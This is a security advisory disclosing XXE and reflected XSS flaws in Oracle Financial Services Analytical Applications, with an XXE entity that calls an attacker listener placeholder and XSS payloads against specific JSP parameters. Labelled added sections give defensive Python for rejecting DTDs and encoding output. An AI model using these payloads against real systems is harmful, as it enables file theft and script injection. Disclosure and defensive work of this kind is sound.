
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
=======================================================================
              title: XXE & Reflected XSS
            product: Oracle Financial Services Analytical Applications
 vulnerable version: 7.3.5.x, 8.0.x
      fixed version: Oracle CPU January 2018
         CVE number: CVE-2018-2660, CVE-2018-2661
             impact: High
           homepage: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html
              found: 2017-06-15
                 by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Oracle is the unchallenged leader in Financial Services, with an
integrated, best-in-class, end-to-end solution of intelligent software
and powerful hardware designed to meet every financial service need."

Source: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html

Business recommendation:
------------------------
By exploiting the XXE vulnerability, an attacker can gain read access to the
filesystem of the system running the OFSAA web application and thus obtain
sensitive information from it. It is also possible to bypass input
validation checks in order to inject JavaScript code.

SEC Consult recommends installing the patched version immediately.
Furthermore, a thorough security review should be performed by security
professionals to identify potential further security issues.

Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)

The web application allows users to import XML files. An attacker can import a
specially crafted XML file and exploit the XXE vulnerability within the application.

2) Reflected Cross Site Scripting (CVE-2018-2661)

This vulnerability allows an unauthenticated user to inject malicious client
side script which will be executed in the browser of a user who visits
the manipulated URL.

Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-2660)

For example, by importing the following XML code in the "Business Model Upload"
function a connection request from the server to the attacker's system will be made:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://IP:port/">
]>
<foo>&xxe;</foo>

IP:port = IP address and port where the attacker is listening for connections

Furthermore, some files can be exfiltrated to remote servers via the
techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
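The defensive counterpart of the import issue above, as an added example that is not part of the SEC Consult advisory and not OFSAA code: a server-side check that an upload endpoint such as "Business Model Upload" should run before handing user-supplied XML to its real parser. It assumes the handler has the raw upload bytes; the two sample documents and the `check_upload` function name are constructed for this example. The check uses Python's expat binding with handlers that abort on the first DOCTYPE or ENTITY declaration, so no external resource is ever requested and no entity is expanded, which also stops internal-entity expansion ("billion laughs") uploads.

```python
"""Reject DTD and entity declarations in uploaded XML before parsing it.

Added example (not the advisory's or OFSAA's code). The first pass runs the
bytes through expat with handlers that raise on any DOCTYPE or ENTITY
declaration; only DTD-free documents reach the application's parser.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when an upload carries a DOCTYPE or an entity declaration."""


def check_upload(xml_bytes: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded XML document."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at "<!DOCTYPE ... [" before any entity is declared or used.
        raise UnsafeXmlError(f"DOCTYPE {name!r} is not allowed in uploads")

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        # Defence in depth: a SYSTEM/PUBLIC id means an external entity.
        kind = "external" if (system_id or public_id) else "internal"
        raise UnsafeXmlError(f"{kind} entity {name!r} is not allowed in uploads")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity

    try:
        parser.Parse(xml_bytes, True)
    except UnsafeXmlError as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"

    # No DTD present: safe to hand to the application's parser.
    root = ET.fromstring(xml_bytes)
    return True, f"accepted root element <{root.tag}>"


# Constructed sample with the shape of the advisory's proof of concept; the
# listener address is a placeholder, not a real host.
XXE_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://IP:port/">
]>
<foo>&xxe;</foo>"""

# Constructed sample of a harmless business model document.
BENIGN_SAMPLE = b"""<?xml version="1.0"?>
<model name="example">
  <entity name="Customer"/>
</model>"""


if __name__ == "__main__":
    for label, doc in (("xxe", XXE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        accepted, reason = check_upload(doc)
        print(f"{label}: {'ACCEPT' if accepted else 'REJECT'} - {reason}")
```

The same policy is available in Java, where OFSAA's JSP stack lives, by setting `disallow-doctype-decl` to true on the `DocumentBuilderFactory` (or `XMLInputFactory.SUPPORT_DTD` to false for StAX); the Python version above just makes the decision visible and testable.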

2) Reflected Cross Site Scripting (CVE-2018-2661)

The following parameters have been found to be vulnerable to
reflected cross site scripting attacks. Furthermore, there are many more
vulnerable parameters.

The following payload shows a simple alert message box:

URL     : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD  : GET
PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20οnerrοr=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL     : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~
METHOD  : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm
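The two payloads above land in two different output contexts: `winTitle` is reflected inside an HTML `<title>` element (the payload closes it with `</title>` and opens a new tag), while `errorMessage` is reflected inside a JavaScript string literal (the payload closes the string with `'` and appends a statement). The fix is context-specific output encoding rather than input filtering. The following is an added example, not part of the SEC Consult advisory and not the real JSP code; the page template in `render_popup`, the `showError` function name and the query strings are constructed assumptions that only mirror the shape of the reflected parameters.

```python
"""Context-aware output encoding for the two sinks shown in the advisory.

Added example (not the advisory's or OFSAA's code): HTML element content and
JavaScript string literals need different encoders, and the HTML one alone
does not make the JavaScript sink safe.
"""
import html
import json
from urllib.parse import unquote_plus


def parse_query(query_string: str) -> dict:
    """Decode a URL query string into a dict of single values (last one wins).

    Done by hand so ';' inside a value is never treated as a separator.
    """
    params = {}
    for pair in query_string.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def html_text(value: str) -> str:
    """Encode for HTML element content, e.g. between <title> and </title>."""
    return html.escape(value, quote=True)


def js_string(value: str) -> str:
    """Encode for a JavaScript string literal inside an inline <script>.

    json.dumps yields a double-quoted, backslash-escaped literal (quotes and
    newlines cannot terminate it). '<' and '>' are escaped as well so the
    literal can never contain '</script>' or '<!--', which the HTML parser
    would otherwise honour before JavaScript ever runs.
    """
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e")


def render_popup(query_string: str) -> str:
    """Hypothetical page fragment (assumption): title in <title>, message in JS."""
    params = parse_query(query_string)
    win_title = params.get("winTitle", "")
    error_message = params.get("errorMessage", "")
    return (
        f"<title>{html_text(win_title)}</title>\n"
        f"<script>showError({js_string(error_message)});</script>"
    )


# Constructed query with the structure of the advisory's two payloads, using
# harmless markup and a harmless statement in place of the originals.
SAMPLE_QUERY = "winTitle=a%3C/title%3E%3Cb%3Ex&errorMessage=%27;alert%0a(0);//"


if __name__ == "__main__":
    print(render_popup(SAMPLE_QUERY))
```

Running it shows the title value rendered as `a&lt;/title&gt;&lt;b&gt;x`, so the document still has exactly one `<title>` element, and the message rendered as a single JavaScript string containing the quote, the semicolon and the escaped newline rather than a second statement.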

Vulnerable / tested versions:
-----------------------------
The following version has been tested, which was the most recent one when
the vulnerabilities were discovered:

* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle, all versions 7.3.5.x and 8.0.x are affected before CPU
January 2018.

Vendor contact timeline:
------------------------
2017-09-11: Contacting vendor through encrypted email (secalert_us@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that the Critical Patch Update that includes fixes
            for the reported issues will be released on 2018-01-16.
            CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory

Solution:
---------
Apply the patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Shah / @2018
